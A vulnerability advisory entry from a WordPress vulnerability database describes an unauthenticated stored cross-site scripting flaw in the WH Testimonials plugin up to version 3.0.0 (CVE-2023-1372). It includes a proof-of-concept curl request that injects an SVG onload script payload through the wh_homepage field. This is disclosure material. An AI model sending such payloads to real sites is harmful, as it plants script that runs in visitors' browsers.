Lucene search
WpvulndbWPEX-ID:7F8E4A22-4349-483E-8071-07292AE96730HistoryMar 11, 2023 - 12:00 a.m.
WH Testimonials <= 3.0.0 - Unauthenticated Stored XSS
2023-03-1100:00:00
wpvulndb
83
unauthenticated stored xss
http post
boundary header
EPSS
0.001
Percentile
40.7%
The plugin does not sanitise and escape the wh_homepage, wh_text_short and wh_text_full parameters of submitted Testimonials, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks
curl -X POST 'http://example.com/add/' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
-H 'Host: example.com' \
-H 'Content-Length: XXX' \
-d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormsoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'Related
wpvulndb
wpvulndb
WH Testimonials <= 3.0.0 - Unauthenticated Stored XSS
2023-03-11 00:00:00
nvd
nvd
CVE-2023-1372
2023-03-13 13:15:11
prion
prion
Cross site scripting
2023-03-13 13:15:00
cve
cve
CVE-2023-1372
2023-03-13 13:15:11
cvelist
cvelist
CVE-2023-1372
2023-03-13 12:20:15
wordfence
wordfence